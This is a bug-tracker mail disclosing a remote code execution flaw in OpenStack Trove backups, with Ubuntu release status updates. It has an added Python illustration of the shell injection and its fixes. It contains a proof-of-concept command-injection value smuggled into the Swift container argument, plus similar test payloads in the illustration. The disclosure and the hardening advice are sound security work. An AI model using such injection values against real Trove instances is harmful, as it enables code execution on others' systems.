[Bug 2028680] [NEW] Remote code execution: Trove backup

Corey Bryant 2028680 at bugs.launchpad.net
Tue Jul 25 15:07:23 UTC 2023


Public bug reported:

Note: Details taken from
https://storyboard.openstack.org/#!/story/2010004

An external security audit by Adam Bell, CyberCX New Zealand (conducted
for Catalyst Cloud) has identified a Remote Code Execution security
issue in Trove.

During a Trove instance backup, it is possible to pass extra arguments
through the guestagent to docker; the backup Python code then hands
them to a subprocess shell, which executes them, giving Remote Code
Execution inside the Trove backup container.

Replication steps:

1) Create a MySQL database instance.
2) Issue a backup command using the following: $ openstack database backup create --instance rce-db1 --swift-container 'test --db-user="$(touch /rce_successful.txt)"' backup-name1

Validation of the RCE can be observed from within the Trove VM:

root@rce-db1:~# docker cp db_backup:/rce_successful.txt .
root@rce-db1:~# ls -l rce_successful.txt
-rw-r--r-- 1 root root 0 Apr 20 04:20 rce_successful.txt

The touch command above can be replaced with any shell command,
including apt.
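The pattern behind the report is a user-supplied value (the Swift container name) interpolated into a command string that is then run through a shell, so `$(...)` is expanded before the real program ever sees it. The following is an added illustration, not Trove's code and not its fix: it stands in a harmless `echo` for the backup tool, runs the report's payload shape through a vulnerable string-built `shell=True` call and through two hardened variants (an argv list with no shell, and `shlex.quote` when a shell string is unavoidable), and repeats the report's `touch` proof in a temporary directory. The allowlist regex for container names is an assumption for the example, not a statement of what Swift or Trove accept.

```python
import os
import re
import shlex
import subprocess
import tempfile

# Constructed payload, same shape as the --swift-container value in the report.
PAYLOAD = 'test --db-user="$(echo INJECTED)"'


def build_shell_command(container: str) -> str:
    # Vulnerable: untrusted data pasted into a string that /bin/sh will parse.
    # "echo" is a stand-in for the real backup tool (hypothetical, for illustration).
    return f"echo backup container: {container}"


def run_vulnerable(container: str) -> str:
    # shell=True means the $(...) inside the container name is executed.
    result = subprocess.run(
        build_shell_command(container),
        shell=True, capture_output=True, text=True, check=True,
    )
    return result.stdout.strip()


def run_hardened(container: str) -> str:
    # Hardened: argv list, no shell. The container name reaches the program
    # as one literal argument; nothing interprets $(...) or extra flags.
    result = subprocess.run(
        ["echo", "backup container:", container],
        shell=False, capture_output=True, text=True, check=True,
    )
    return result.stdout.strip()


def run_quoted(container: str) -> str:
    # If a shell string is unavoidable, quote every untrusted piece so the
    # shell treats it as a single literal word.
    cmd = f"echo backup container: {shlex.quote(container)}"
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True, check=True)
    return result.stdout.strip()


def probe_file_created(runner) -> bool:
    # Repeat the report's proof: does a $(touch ...) in the container name
    # create the marker file? True for the vulnerable runner, False otherwise.
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "rce_successful.txt")
        runner(f'test --db-user="$(touch {marker})"')
        return os.path.exists(marker)


# Assumed allowlist for this example only; check the real service's rules
# before adopting it. Defence in depth on top of not using a shell.
CONTAINER_NAME_RE = re.compile(r"[A-Za-z0-9._-]{1,255}")


def validate_container_name(name: str) -> bool:
    return CONTAINER_NAME_RE.fullmatch(name) is not None


if __name__ == "__main__":
    print("vulnerable :", run_vulnerable(PAYLOAD))
    print("argv list  :", run_hardened(PAYLOAD))
    print("shlex.quote:", run_quoted(PAYLOAD))
    print("touch via vulnerable runner:", probe_file_created(run_vulnerable))
    print("touch via hardened runner  :", probe_file_created(run_hardened))
    print("payload passes allowlist?  :", validate_container_name(PAYLOAD))
```

The argv-list form is the preferable fix: the value never passes through a shell, so neither command substitution nor injected `--db-user` style flags can be smuggled in. Note that an argv list alone does not stop the receiving program from parsing a value that begins with `-` as an option, which is why a strict allowlist on the name is still worth having.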

** Affects: openstack-trove (Ubuntu)
     Importance: High
         Status: Fix Released

** Affects: openstack-trove (Ubuntu Jammy)
     Importance: High
         Status: Triaged

** Affects: openstack-trove (Ubuntu Lunar)
     Importance: High
         Status: Fix Released

** Affects: openstack-trove (Ubuntu Mantic)
     Importance: High
         Status: Fix Released

** Also affects: openstack-trove (Ubuntu Mantic)
   Importance: Undecided
       Status: New

** Also affects: openstack-trove (Ubuntu Lunar)
   Importance: Undecided
       Status: New

** Also affects: openstack-trove (Ubuntu Jammy)
   Importance: Undecided
       Status: New

** Changed in: openstack-trove (Ubuntu Lunar)
       Status: New => Fix Released

** Changed in: openstack-trove (Ubuntu Mantic)
       Status: New => Fix Released

** Changed in: openstack-trove (Ubuntu Jammy)
       Status: New => Triaged

** Changed in: openstack-trove (Ubuntu Jammy)
   Importance: Undecided => High

** Changed in: openstack-trove (Ubuntu Lunar)
   Importance: Undecided => High

** Changed in: openstack-trove (Ubuntu Mantic)
   Importance: Undecided => High

-- 
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to openstack-trove in Ubuntu.
https://bugs.launchpad.net/bugs/2028680